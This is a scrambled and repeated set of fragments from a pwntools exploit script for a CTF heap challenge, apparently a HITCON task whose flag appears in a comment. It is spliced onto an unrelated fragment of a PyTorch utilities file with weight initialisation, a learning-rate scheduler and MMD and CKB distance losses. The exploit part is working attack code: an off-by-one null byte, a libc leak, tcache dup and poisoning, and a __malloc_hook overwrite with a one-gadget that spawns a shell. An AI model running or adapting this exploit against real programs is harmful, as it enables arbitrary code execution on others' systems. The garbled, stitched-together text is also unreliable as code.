[rsp+0x40] == NULL ''' # table[6] => fake_chunk (0x7f) #", "(0x71) # this allocation serves chunk_1 and put fake chunk address in the", "at the end of buffer. # when i == 0, off-by-one happens and", "due to double free # freeing chunk_1 and chunk_5 put them in the", "# then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 +", "we freed so it can be consolidated with chunk_2 later delete_heap(0) # when", "of buffer. # when i == 0, off-by-one happens and turn size of", "with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook -", "so, we need to zero out some parts of the chunk_1. Therefore, #", "chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr +", "out some parts of the chunk_1. 
Therefore, # we are allocating/freeing the chunk_1", "bin in tcache # even though they are pointing to the same address", "(0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' *", "# viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base =", "will be put in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511)", "8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511)", "chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free chunk_2, it", "delete_heap(0) delete_heap(2) # we can create a fake chunk before __malloc_hook with size", "p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500,", "{'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1]", "0x67) # we used tcache_dup attack here which is due to double free", "the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will use", "of previous # chunks with the top chunk new_heap(0x20, 'd' * 0x20) #", "+ p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we have shell", "but the program only cares # about the input size for i in", "* 0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3]", "allocating/freeing the chunk_1 multiple times with different sizes # interestingly, it always have", "* 0x67) # we used tcache_dup attack here which is due to double", "table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly in the same", "the same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup", "call delete_heap(0) # table[0] => chunk_1 (0x71) # this set the prev_size field", "- len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71)", "hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})", "fake_chunk is at the head of the list, this allocation returns it #", "pointing to the same address delete_heap(0) delete_heap(2) # we can create a fake", "place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here", "writes null byte at the end of buffer. # when i == 0,", "'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning here", "chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. 
new_heap(0x68 -", "overlapping free chunk with chunk_1 # the resulting big chunk will be put", "return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ',", "writes # a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507)", "0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6]", "in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will", "malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) #", "the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when", "# even though they are pointing to the same address delete_heap(0) delete_heap(2) #", "even though they are pointing to the same address delete_heap(0) delete_heap(2) # we", "be consolidated with chunk_2 later delete_heap(0) # when we free a chunk, programs", "with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env", "chunk_1 multiple times with different sizes # interestingly, it always have chunk size", "for preventing consolidation of previous # chunks with the top chunk new_heap(0x20, 'd'", "need to free the chunk, so malloc returns it on the next new_heap", "in tcache # even though they are pointing to the same address delete_heap(0)", "off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it can be", "# chunk_5 will be served from tcache and we will put the address", "= process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a'", "with the top chunk new_heap(0x20, 'd' * 0x20) # we need to delete", "can be consolidated with chunk_2 later delete_heap(0) # when we free a chunk,", "new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free chunk_2, it consolidates", "same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack", "(0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' *", "(0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this chunk", "of chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. 
new_heap(0x68", "# table[6] => fake_chunk (0x7f) # since fake_chunk is at the head of", "from tcache and we will put the address of # our fake chunk", "is due to double free # freeing chunk_1 and chunk_5 put them in", "table[3] => chunk_3 (0x31) # this chunk is for preventing consolidation of previous", "'1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline()", "so malloc returns it on the next new_heap call delete_heap(0) # table[0] =>", "(0x31) # this chunk is for preventing consolidation of previous # chunks with", "# table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly in the", "with different sizes # interestingly, it always have chunk size of 0x71, but", "free the chunk, so malloc returns it on the next new_heap call delete_heap(0)", "data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:',", "delete_heap(2) # we can create a fake chunk before __malloc_hook with size of", "the top chunk new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1,", "head of the list, this allocation returns it # then, we overwrite __malloc_hook", "fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5", "this allocation returns it # then, we overwrite __malloc_hook with one gadget new_heap(0x68,", "str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index):", "'3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p", "to the same address delete_heap(0) delete_heap(2) # we can create a fake chunk", "gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers", "=> chunk_4 (0x511) # this will use the unsorted bin for allocation, and", "buffer. # when i == 0, off-by-one happens and turn size of chunk_2", "', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size:", "it can be consolidated with chunk_2 later delete_heap(0) # when we free a", "delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p", "of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we free chunk_2,", "0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we have", "happens and turn size of chunk_2 from # 0x601 t0 0x600. Therefore, we", "exactly in the same place as chunk_1 new_heap(0x68, 'f' * 0x67) # we", "the chunk_1. 
Therefore, # we are allocating/freeing the chunk_1 multiple times with different", "0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base", "of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print", "used tcache_dup attack here which is due to double free # freeing chunk_1", "0x67) # table[2] => chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] =>", "context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763) p = process('./program', env =", "=> chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will be served", "=> fake_chunk (0x7f) # since fake_chunk is at the head of the list,", "preventing consolidation of previous # chunks with the top chunk new_heap(0x20, 'd' *", "top chunk new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1, so", "0x5ef) # table[3] => chunk_3 (0x31) # this chunk is for preventing consolidation", "* 0x20) # we need to delete chunk_1, so we can re-allocate it", "show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr)))", "0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake", "* 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' #", "p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print", "a overlapping free chunk with chunk_1 # the resulting big chunk will be", "a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing", "# table[1] => chunk_4 (0x511) # this will use the unsorted bin for", "byte at the end of buffer. # when i == 0, off-by-one happens", "(0x71) # this set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60", "0x4f322)) # this allocation triggers __malloc_hook and we have shell new_heap(1, '', True)", "{}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly in", "resulting big chunk will be put in the unsorted bin delete_heap(2) # table[1]", "'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate chunk_5", "overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322))", "(0x71) # this causes strcpy writes null byte at the end of buffer.", "and turn size of chunk_2 from # 0x601 t0 0x600. Therefore, we clear", "delete_heap(0) # table[0] => chunk_1 (0x71) # this set the prev_size field of", "of the list, this allocation returns it # then, we overwrite __malloc_hook with", "i)) # we need to free the chunk, so malloc returns it on", "prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580)) # when we", "range(9): # table[0] => chunk_1 (0x71) # this causes strcpy writes null byte", "# table[0] => chunk_1 (0x71) # this causes strcpy writes null byte at", "the end of buffer. # when i == 0, off-by-one happens and turn", "# this will use the unsorted bin for allocation, and writes # a", "size for i in range(9): # table[0] => chunk_1 (0x71) # this causes", "# 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b'", "clear PREV_IN_USE bit. 
new_heap(0x68 - i, 'b' * (0x68 - i)) # we", "i == 0, off-by-one happens and turn size of chunk_2 from # 0x601", "chunk new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1, so we", "new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67)", "the chunk, so malloc returns it on the next new_heap call delete_heap(0) #", "'a' * 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) #", "we need to zero out some parts of the chunk_1. Therefore, # we", "before __malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30 fake_chunk =", "here which is due to double free # freeing chunk_1 and chunk_5 put", "in the same bin in tcache # even though they are pointing to", "we will put the address of # our fake chunk in the chunk_1's", "chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here which is", "= remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] =>", "to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it", "it consolidates with chunk_0 # therefore, we have a overlapping free chunk with", "table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] => chunk_2 (0x601)", "in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed", "0x60 + p64(0x580)) # when we free chunk_2, it consolidates with chunk_0 #", "will use the unsorted bin for allocation, and writes # a libc address", "len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) #", "of the chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple times with", "libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc", "fake_chunk (0x7f) # since fake_chunk is at the head of the list, this", "free chunk_2, it consolidates with chunk_0 # therefore, we have a overlapping free", "# this allocation triggers __malloc_hook and we have shell new_heap(1, '', True) p.interactive()", "always have chunk size of 0x71, but the program only cares # about", "chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will be served from", "chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak libc", "''' # table[6] => fake_chunk (0x7f) # since fake_chunk is at the head", "whole chunk # so, we need to zero out some parts of the", "+ 0x4f322)) # this allocation triggers __malloc_hook and we have shell new_heap(1, '',", "* 0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2]", "will allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68, 'f' *", "0x4ff) # table[1] => chunk_1 (0x71) new_heap(0x68, 'b' * 0x67) # table[2] =>", "= {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) #", "attack delete_heap(1) # chunk_0 should we freed so it can be consolidated with", "chunk_1 (0x71) # this set the prev_size field of chunk_2 new_heap(0x68, 'b' *", "0x20) # we need to delete chunk_1, so we can re-allocate it again", "# chunk_0 should we freed so it can be consolidated with chunk_2 later", "# so, we need to zero out some parts of the chunk_1. Therefore,", "fd. 
new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves chunk_1", "len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def", "* (0x68 - i)) # we need to free the chunk, so malloc", "though they are pointing to the same address delete_heap(0) delete_heap(2) # we can", "it again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0", "base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this will allocate chunk_5 exactly", "returns it # then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' *", "serves chunk_1 and put fake chunk address in the tcache new_heap(0x68, 'h' *", "== 0, off-by-one happens and turn size of chunk_2 from # 0x601 t0", "viwing chunk_1 will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr", "malloc returns it on the next new_heap call delete_heap(0) # table[0] => chunk_1", "# table[5] => chunk_1 (0x71) # this allocation serves chunk_1 and put fake", "chunk address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40,", "and we will put the address of # our fake chunk in the", "table[1] => chunk_4 (0x511) # this will use the unsorted bin for allocation,", "chunk_1 (0x71) # this causes strcpy writes null byte at the end of", "delete_heap(2) # table[1] => chunk_4 (0x511) # this will use the unsorted bin", "this chunk is for preventing consolidation of previous # chunks with the top", "'b' * (0x68 - i)) # we need to free the chunk, so", "table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff) # table[1] => chunk_1 (0x71)", "new_heap(0x20, 'd' * 0x20) # we need to delete chunk_1, so we can", "# we used tcache_dup attack here which is due to double free #", "leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' *", "consolidation of previous # chunks with the top chunk new_heap(0x20, 'd' * 0x20)", "process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' *", "in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints:", "pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size))", "env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0 (0x511) new_heap(0x500, 'a' * 0x4ff)", "table[6] => fake_chunk (0x7f) # since fake_chunk is at the head of the", "so it can be consolidated with chunk_2 later delete_heap(0) # when we free", "0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used", "one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation", "choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12',", "of 0x71, but the program only cares # about the input size for", "attack here which is due to double free # freeing chunk_1 and chunk_5", "table[4] => chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will be", "returns it on the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71)", "= u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base:", "the input size for i in range(9): # table[0] => chunk_1 (0x71) #", "tcache and we will put the address of # our fake chunk in", "can create a fake chunk before __malloc_hook with size of 0x7f malloc_hook 
=", "chunk_1 and put fake chunk address in the tcache new_heap(0x68, 'h' * 0x67)", "chunk is for preventing consolidation of previous # chunks with the top chunk", "this will use the unsorted bin for allocation, and writes # a libc", "our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1", "need to delete chunk_1, so we can re-allocate it again # in order", "we have a overlapping free chunk with chunk_1 # the resulting big chunk", "chunk, so malloc returns it on the next new_heap call delete_heap(0) # table[0]", "put them in the same bin in tcache # even though they are", "of # our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5]", "0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit. new_heap(0x68 - i, 'b' *", "consolidates with chunk_0 # therefore, we have a overlapping free chunk with chunk_1", "with chunk_0 # therefore, we have a overlapping free chunk with chunk_1 #", "list, this allocation returns it # then, we overwrite __malloc_hook with one gadget", "into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1 will leak", "programs writes 0xDA to the whole chunk # so, we need to zero", "will be served from tcache and we will put the address of #", "use the unsorted bin for allocation, and writes # a libc address into", "p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook and we have shell new_heap(1,", "- 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] => chunk_5 (0x71) # this", "cares # about the input size for i in range(9): # table[0] =>", "some parts of the chunk_1. Therefore, # we are allocating/freeing the chunk_1 multiple", "delete chunk_1, so we can re-allocate it again # in order to launch", "fake chunk before __malloc_hook with size of 0x7f malloc_hook = libc_base + 0x3ebc30", "# freeing chunk_1 and chunk_5 put them in the same bin in tcache", "have chunk size of 0x71, but the program only cares # about the", "size of 0x71, but the program only cares # about the input size", "def show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ',", "the program only cares # about the input size for i in range(9):", "with chunk_2 later delete_heap(0) # when we free a chunk, programs writes 0xDA", "# p = remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) #", "delete_heap(1) # chunk_0 should we freed so it can be consolidated with chunk_2", "strcpy writes null byte at the end of buffer. # when i ==", "= p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00' * (8 - len(libc_addr))) - 0x3ebca0", "* (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2] =>", "the resulting big chunk will be put in the unsorted bin delete_heap(2) #", "chunk_1's fd. 
new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this allocation serves", "chunk_0 # therefore, we have a overlapping free chunk with chunk_1 # the", "the list, this allocation returns it # then, we overwrite __malloc_hook with one", "__malloc_hook with one gadget new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) #", "about the input size for i in range(9): # table[0] => chunk_1 (0x71)", "have a overlapping free chunk with chunk_1 # the resulting big chunk will", "def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} #", "are pointing to the same address delete_heap(0) delete_heap(2) # we can create a", "turn size of chunk_2 from # 0x601 t0 0x600. Therefore, we clear PREV_IN_USE", "put in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) # this", "it # then, we overwrite __malloc_hook with one gadget new_heap(0x68, 'i' * 0x13", "new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322)) # this allocation triggers __malloc_hook", "previous # chunks with the top chunk new_heap(0x20, 'd' * 0x20) # we", "NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk is at the", "python from pwn import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1')", "multiple times with different sizes # interestingly, it always have chunk size of", "off-by-one happens and turn size of chunk_2 from # 0x601 t0 0x600. Therefore,", "the address of # our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk))", "# interestingly, it always have chunk size of 0x71, but the program only", "will put the address of # our fake chunk in the chunk_1's fd.", "allocation serves chunk_1 and put fake chunk address in the tcache new_heap(0x68, 'h'", "0, off-by-one happens and turn size of chunk_2 from # 0x601 t0 0x600.", "bin delete_heap(2) # table[1] => chunk_4 (0x511) # this will use the unsorted", "delete_heap(0) # when we free a chunk, programs writes 0xDA to the whole", "to zero out some parts of the chunk_1. Therefore, # we are allocating/freeing", "# chunks with the top chunk new_heap(0x20, 'd' * 0x20) # we need", "fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71)", "=> chunk_5 (0x71) # this will allocate chunk_5 exactly in the same place", "on the next new_heap call delete_heap(0) # table[0] => chunk_1 (0x71) # this", "allocation, and writes # a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e'", "0xDA to the whole chunk # so, we need to zero out some", "'\\x00' * (8 - len(libc_addr))) - 0x3ebca0 print 'libc base: {}'.format(hex(libc_base)) # table[2]", "# this will allocate chunk_5 exactly in the same place as chunk_1 new_heap(0x68,", "served from tcache and we will put the address of # our fake", "so we can re-allocate it again # in order to launch off-by-one (poison-null-byte)", "p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3') p.sendlineafter('Index:',", "for allocation, and writes # a libc address into chunk_1 fd/bk fields new_heap(0x508,", "chunk_5 will be served from tcache and we will put the address of", "chunk_1. 
Therefore, # we are allocating/freeing the chunk_1 multiple times with different sizes", "# this set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 +", "for i in range(9): # table[0] => chunk_1 (0x71) # this causes strcpy", "- i, 'b' * (0x68 - i)) # we need to free the", "* def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack:", "address of # our fake chunk in the chunk_1's fd. new_heap(0x68, p64(fake_chunk)) #", "p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def", "program only cares # about the input size for i in range(9): #", "as chunk_1 new_heap(0x68, 'f' * 0x67) # we used tcache_dup attack here which", "address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ)", "bit. new_heap(0x68 - i, 'b' * (0x68 - i)) # we need to", "sizes # interestingly, it always have chunk size of 0x71, but the program", "show_heap(index): p.sendlineafter('Your choice: ', '2') p.sendlineafter('Index:', str(index)) def delete_heap(index): p.sendlineafter('Your choice: ', '3')", "input size for i in range(9): # table[0] => chunk_1 (0x71) # this", "chunk, programs writes 0xDA to the whole chunk # so, we need to", "', '3') p.sendlineafter('Index:', str(index)) with context.quiet: # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} # p = remote('192.168.127.12', 8763)", "0x71, but the program only cares # about the input size for i", "fake chunk address in the tcache new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\",", "# table[3] => chunk_3 (0x31) # this chunk is for preventing consolidation of", "launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should we freed so it can", "should we freed so it can be consolidated with chunk_2 later delete_heap(0) #", "== NULL ''' # table[6] => fake_chunk (0x7f) # since fake_chunk is at", "will leak libc address show_heap(0) libc_addr = p.recvuntil('\\n$$')[:-3] libc_base = u64(libc_addr + '\\x00'", "attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if attack: return p.sendafter('Data:', data) if", "=> chunk_2 (0x601) new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) #", "chunk_3 (0x31) # this chunk is for preventing consolidation of previous # chunks", "be served from tcache and we will put the address of # our", "again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1) # chunk_0 should", "'e' * 0x507) # viwing chunk_1 will leak libc address show_heap(0) libc_addr =", "null byte at the end of buffer. # when i == 0, off-by-one", "in the chunk_1's fd. 
new_heap(0x68, p64(fake_chunk)) # table[5] => chunk_1 (0x71) # this", "same address delete_heap(0) delete_heap(2) # we can create a fake chunk before __malloc_hook", "this set the prev_size field of chunk_2 new_heap(0x68, 'b' * 0x60 + p64(0x580))", "import * def new_heap(size, data, attack=False): p.sendlineafter('Your choice: ', '1') p.sendlineafter('Size:', str(size)) if", "new_heap(0x68, 'h' * 0x67) ''' 0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL", "0x4f322 execve(\"/bin/sh\", rsp+0x40, environ) constraints: [rsp+0x40] == NULL ''' # table[6] => fake_chunk", "new_heap(0x5f0, 'c' * 0x5ef) # table[3] => chunk_3 (0x31) # this chunk is", "and writes # a libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' *", "libc_base + 0x3ebc30 fake_chunk = malloc_hook - 0x13 print 'fake chunk: {}'.format(hex(fake_chunk)) #", "# we need to free the chunk, so malloc returns it on the", "# table[4] => chunk_5 (0x71) # we used tcache_poisoning here # chunk_5 will", "# since fake_chunk is at the head of the list, this allocation returns", "libc address into chunk_1 fd/bk fields new_heap(0x508, 'e' * 0x507) # viwing chunk_1", "=> chunk_1 (0x71) # this allocation serves chunk_1 and put fake chunk address", "i, 'b' * (0x68 - i)) # we need to free the chunk,", "chunk_1 and chunk_5 put them in the same bin in tcache # even", "chunk_4 (0x511) # this will use the unsorted bin for allocation, and writes", "a chunk, programs writes 0xDA to the whole chunk # so, we need", "can re-allocate it again # in order to launch off-by-one (poison-null-byte) attack delete_heap(1)", "chunk: {}'.format(hex(fake_chunk)) # table[4] => chunk_5 (0x71) # we used tcache_poisoning here #", "used tcache_poisoning here # chunk_5 will be served from tcache and we will", "'f' * 0x67) # we used tcache_dup attack here which is due to", "remote('192.168.127.12', 8763) p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'}) # table[0] => chunk_0", "be put in the unsorted bin delete_heap(2) # table[1] => chunk_4 (0x511) #", "* 0x60 + p64(0x580)) # when we free chunk_2, it consolidates with chunk_0", "unsorted bin for allocation, and writes # a libc address into chunk_1 fd/bk", "if attack: return p.sendafter('Data:', data) if len(data) < size: p.sendline() def show_heap(index): p.sendlineafter('Your", "chunk_2 later delete_heap(0) # when we free a chunk, programs writes 0xDA to" ]
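# A quick sanity check on the forged prev_size used above (illustrative; this
# assert is not part of the original exploit): chunk_0 spans 0x510 bytes and
# chunk_1 spans 0x70, so writing prev_size = 0x580 into chunk_2 makes
# free(chunk_2) walk back over both chunks and merge them into one
# unsorted-bin chunk that overlaps chunk_1.
assert 0x510 + 0x70 == 0x580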
[ "weight_decay * 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## #", "classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias)", "torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\"", "CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def", "= lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return", "m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm')", "U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t", "R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s", "<filename>CKButils.py # -*- coding: utf-8 -*- import torch from torch.autograd import Variable import", "0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num)", "correct = 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X),", "U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() +", "accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power,", "R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s =", "m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') !=", "import sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\"", "= 